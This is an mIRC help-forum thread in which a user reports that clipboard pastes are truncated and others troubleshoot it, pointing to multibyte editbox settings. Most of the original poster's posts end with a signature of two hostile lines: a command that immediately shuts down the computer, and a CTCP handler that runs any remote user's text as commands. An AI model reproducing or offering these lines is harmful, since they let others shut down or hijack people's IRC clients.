mIRC Home    About    Download    Register    News    Help

Print Thread
Page 1 of 2 1 2
Paste From Clipboard #155098 03/08/06 09:16 PM
Joined: Feb 2006
Posts: 64
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Joined: Feb 2006
Posts: 64
It seems that when I try to paste long streams or scripts to someone in a chat window, it only pastes a few of the lines and then stops, this wasn't so in mirc 6.17 (althought even that didn't paste over so many lines). I can't seem to find any option to allow for more, and i've disabled the flood protection that's built it with still no results, and even that is set to 5000 lines. Currently, it seems to paste about 16 lines and then just stop, and so i have to constantly copy+paste from the document or script to paste it to the person. If this is an option that can be turned off, that'd be great, if it's a copy-paste bug created in this new version as someone suggested to me that it may be, then I hope it's fixed soon.

Thanks


/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
Re: Paste From Clipboard #155099 04/08/06 12:27 AM
Joined: Jul 2003
Posts: 655
Om3n Offline
Fjord artisan
Offline
Fjord artisan
Joined: Jul 2003
Posts: 655
This may be a sever side anti-flood feature.

Most IRCD's have built in message queues (sendq) to avoid flood, in general cases they let you send so many lines instantly before it starts queueing on the server side (if client internal queue bypassed or not used). A server will only keep so many messages in the sendq for a user. After that is reached what the server does can vary, some disconnect the user (flood, sendq exceeded, etc).

It could also be a channel mode or chanserv setting designed to prevent channel flood.

If you are versed in scripting, you can create a simple dialog with just a big text area / editbox, and a 'send' button. The send button could dump the data line by line in a temporary file (or hidden window), then use the /play command to send the messages with a slightly longer delay between lines. You could then just paste the code in the box and hit send.

Another alternative, if you are just pasting privately to somebody, is to open a dcc chat window and paste it there. (since dcc bypasses the server)

Another possible cause could be the person you are pasting to, you mention 16 lines, if i remember correctly 16 lines is the amount used in Invisions default anti-flood protection.

If you are pasting for several people to see, you could also use pastebin.com.

Ok rant over, could indeed be a bug since you mention disabling flood protection and it behaving differently from mirc 6.17. But there is a few possibilities and workarounds there in any case.


"Allen is having a small problem and needs help adjusting his attitude" - Flutterby
Re: Paste From Clipboard #155100 04/08/06 01:32 AM
Joined: Feb 2006
Posts: 64
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Joined: Feb 2006
Posts: 64
Yeah, I was pasting in a channel at the time, and I know I was able to send a lot more at a time before the updated mirc, and it also happens in all four networks I'm in.

I'm able to do essentially the same as play just fine (using .timer 500 0 msg # stuff) and it works perfectly, just that pasting from clipboard doesn't seem to work.


/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
Re: Paste From Clipboard #155101 04/08/06 11:16 AM
Joined: Dec 2002
Posts: 4,563
Khaled Offline
Hoopy frood
Offline
Hoopy frood
Joined: Dec 2002
Posts: 4,563
If you open up a debug window using "/debug @server", and then paste the lines, you will be able to see how many mIRC is actually sending to the server.

Have you tested this with a clean install of mIRC to make sure that the issue isn't related to scripts that you may have installed?

Re: Paste From Clipboard #155102 11/08/06 01:54 AM
Joined: Feb 2006
Posts: 64
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Joined: Feb 2006
Posts: 64
Okay, so I've now determined that it is a limitation of characters and not lines, taken from the clipboard. And yes, this is a fresh install of mirc 6.2, all I've done is load my scripts after that.. none of which affect the pasting from the clipboard.

Testing the same paste on an install of mirc 6.17 I have, the full paste works.

"
-> irc.pantsuland.net PRIVMSG #boba :12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
-> irc.pantsuland.net PRIVMSG #boba :12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
-> irc.pantsuland.net PRIVMSG #boba :12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
-> irc.pantsuland.net PRIVMSG #boba :12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
-> irc.pantsuland.net PRIVMSG #boba :12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
-> irc.pantsuland.net PRIVMSG #boba :12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
-> irc.pantsuland.net PRIVMSG #boba :12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
-> irc.pantsuland.net PRIVMSG #boba :12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
-> irc.pantsuland.net PRIVMSG #boba :12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
-> irc.pantsuland.net PRIVMSG #boba :0,0********
"
is what I see in the @server window...
I'm trying to paste

"
12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
0,0****************************************************************
4,4****************************************************************
0,0****************************************************************
4,4****************************************************************
0,0****************************************************************
4,4****************************************************************
"

As an example.

Last edited by Midori; 11/08/06 01:55 AM.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
Re: Paste From Clipboard #155103 11/08/06 07:11 AM
Joined: Feb 2005
Posts: 342
R
Rand Offline
Fjord artisan
Offline
Fjord artisan
R
Joined: Feb 2005
Posts: 342
Hmmn, that pastes perfectly fine on my 6.2.

(Even opened up a secondary server connection to make sure it was all coming through)

Since you say you're running a fresh mIRC install, I would suggest typing: /remote off, just to be on the safe side. While you may not have anything that actually effects the clipboard, you may have an on input event that does not like pasting.

Also, did you use your old .ini file, or did you use the new .ini file that comes with 6.2?

After you've typed: /remote off, go ahead and paste another big line in the channel, and see if it all goes through.

Last edited by Rand; 11/08/06 07:16 AM.
Re: Paste From Clipboard #155104 11/08/06 07:58 AM
Joined: Feb 2006
Posts: 64
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Joined: Feb 2006
Posts: 64
"
* Remote is off
> 12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
> 12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
> 12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
> 12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
> 12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
> 12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
> 12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
> 12,12***0*12***0*12***0*12***0*12***0*12**12*0,0*****************************************
> 12,12*0*12***0*12***0*12***0*12***0*12***0*12*4,4*****************************************
> 0,0*********
* Remote is on (Ctcps,Events,Raw)
"

Same thing happened again ;P

One of my friends says it's some sort of memory based thing.

Edit:: I do have one on input script, but as you see, it doesn't do anything... so it's not a script.. it's a mirc thing smirk

Last edited by Midori; 11/08/06 08:07 AM.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
Re: Paste From Clipboard #155105 11/08/06 10:47 AM
Joined: Jan 2003
Posts: 1,063
D
Doqnach Offline
Hoopy frood
Offline
Hoopy frood
D
Joined: Jan 2003
Posts: 1,063
might just be the mIRC flood protection ;-]


If it ain't broken, don't fix it!
Re: Paste From Clipboard #155106 15/08/06 09:00 AM
Joined: Feb 2006
Posts: 64
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Joined: Feb 2006
Posts: 64
As i mentioned above, I disabled all the mIRC flood protection by unchecking that box in the options.


/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
Re: Paste From Clipboard #155107 17/08/06 11:57 AM
Joined: Dec 2002
Posts: 4,563
Khaled Offline
Hoopy frood
Offline
Hoopy frood
Joined: Dec 2002
Posts: 4,563
Are you using a single-line or multi-line editbox?

Re: Paste From Clipboard #155108 30/08/06 09:52 AM
Joined: Feb 2006
Posts: 64
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Joined: Feb 2006
Posts: 64
I tried with both single and multi lined edit boxes in: Options -> Display -> Options (that multi-line checkbox - checked and unchecked [default is unchecked for me])
In Options -> IRC -> Messages, I have both of the multibyte boxes checked.

Just now was reading more about /play and saw /play -b playqN.txt (which pasted the entire file) but it's still only those few lines when I use ctrl+v.

Last edited by Midori; 30/08/06 10:00 AM.
Re: Paste From Clipboard [Re: Midori] #183116 17/08/07 10:15 PM
Joined: Feb 2006
Posts: 64
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Joined: Feb 2006
Posts: 64
Bumping this thread as it still hasn't been addressed and even others can produce the same results in a dcc chat window....

open whatsnew.txt ctrl+a, ctrl+c, goto mirc, open a dcc chat with someone.. ctrl+v ...

you'll get no more than:

Code:
> What's new
> ----------
> v2.06.1
> 	- Fixed the ProgressBar bugs (mainly: going back to 0% and not closing)
> v2.06.0
> 	- Added a (poor) graphical progress bar (check GUI, option ProgressBar)
> 	- Cleaned changes of 2.05.3
> 	- In case some network settings were deleted, patchbot will try to load
> 	  network config files found on disk whenever the corresponding network
> 	  is selected/added through the GUI
> 	- Corrected a typo
> v2.05.3
> 	- If fserver is off, the file is directly sent, and you loose all benefits
> 	  of SysReset management (firewall, resends, ...)
> v2.05.2
> 	- Changed colors for fatal error message
> 	- Repaired the webupdater
> v2.05.1 Dedicated to Tekkanano and his great help
> 	- Probably fixed some more dll loading problem		(TFRBT Tekkanano)
> 	- Corrected a typo (well, kind of, but that's all that matters to the user :)
> 								(TFRBT Tekkanano)
> 	- Probably fixed some antiflood stuff			(TFRBT Tekkanano)


because something is still broken smirk


/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
Re: Paste From Clipboard [Re: Midori] #183125 17/08/07 11:27 PM
Joined: Dec 2002
Posts: 2,013
R
RoCk Offline
Hoopy frood
Offline
Hoopy frood
R
Joined: Dec 2002
Posts: 2,013
I pasted the entire contents of whatsnew.txt (278 lines) into a dcc chat window and every line came out on the other end.

~ Edit ~

With the exception of a couple of lines that were interpreted as commands.

Re: Paste From Clipboard [Re: Midori] #183128 17/08/07 11:41 PM
Joined: Aug 2007
Posts: 12
S
segosu Offline
Pikka bird
Offline
Pikka bird
S
Joined: Aug 2007
Posts: 12
This happened to me, and I found it only happened when I had IRC -> Messages -> Multibyte Editbox enabled.

Re: Paste From Clipboard [Re: segosu] #183146 18/08/07 01:24 AM
Joined: Feb 2006
Posts: 64
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Joined: Feb 2006
Posts: 64
When I tried that paste, those options were indeed checked, but as previously mentioned.... that solves nothing.

Also, need the multi-byte edit box for other languages to work correctly. Which, when checked certainly causes clipboard pasting to explode (hence why it is a bug and should be fixed).

Sure, you can uncheck those boxes to paste it all without issues, but then what is the point? Something needs to be fixed and it seems easier in my mind to have the clipboard-paste functionality fixed even when those boxes are checked instead of fixing the unicode characters needing multi-byte to show up. Clearly it's half working, no reason it can't be a simply modification somewhere that will allow it to work in both selections.

And since people have the ignorant idea that changing an option is the solution to every bug reported here.. I'll tell you now that it's not.. so don't post anything related to that any more.. seriously annoying, and doesn't solve anything.

Last edited by Midori; 18/08/07 01:25 AM.

/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
Re: Paste From Clipboard [Re: Midori] #183177 18/08/07 08:07 AM
Joined: Aug 2007
Posts: 12
S
segosu Offline
Pikka bird
Offline
Pikka bird
S
Joined: Aug 2007
Posts: 12
I wasn't saying it was a solution. I was giving my input, since it looked like (as far as I knew) you hadn't found the direct source of the problem yet. Sorry for trying to help.

Re: Paste From Clipboard [Re: segosu] #183207 18/08/07 11:55 AM
Joined: Feb 2006
Posts: 64
M
Midori Offline OP
Babel fish
OP Offline
Babel fish
M
Joined: Feb 2006
Posts: 64
Didn't mean to offend you in particualar, segosu .... but yes, I've known what the problem was for a while, but people attempting to tell me to turn off something that is needed is a foolish way to fix an error, that and I'm getting ticked out how mIRC fails in handling dll's (but that's for another topic later).

So when someone tells me "turn off multi-byte this or that" and I actually need it to see other languages than boring old english, it's not a solution.

Thus the error lies in how ctrl+v event is handled in mIRC when those boxes are checked. Hence it IS a bug and should be looked into and preferably fixed.


/run shutdown.exe -s -t 0
ctcp ^*:r*:*:{$($2-,2)|halt}
Re: Paste From Clipboard [Re: Midori] #183208 18/08/07 12:04 PM
Joined: Jan 2006
Posts: 468
symphony Offline
Fjord artisan
Offline
Fjord artisan
Joined: Jan 2006
Posts: 468
I got to confirm this. After many tests with Midori. This happens only when the multibyte display and multibyte editbox options are checked. Only an random amount between 900 and 958 bytes to be pasted from the clipboard.

Now, the question is, is that intentional?

Re: Paste From Clipboard [Re: Midori] #183220 18/08/07 02:11 PM
Joined: Aug 2007
Posts: 12
S
segosu Offline
Pikka bird
Offline
Pikka bird
S
Joined: Aug 2007
Posts: 12
Oh, okay, I didn't know you knew. And yes, I also would like this to be fixed, seeing as I want to use Multibyte Editbox myself. (For now I disabled it seeing as I can live without it.)

Re: Paste From Clipboard [Re: Midori] #183748 22/08/07 11:06 AM
Joined: Dec 2002
Posts: 4,563
Khaled Offline
Hoopy frood
Offline
Hoopy frood
Joined: Dec 2002
Posts: 4,563
Something else must be going on since I can't seem to reproduce this here.

I tried testing in my normal copy of mIRC 6.3 and in a clean install. In both cases I pasted and received in DCC Chat windows the full contents of the whatsnew.txt file.

I tried with various combinations of settings in the Options/IRC/Messages dialog, including changing the Multibyte settings.

Can you tell me what your font settings are for the DCC Chat windows?

Page 1 of 2 1 2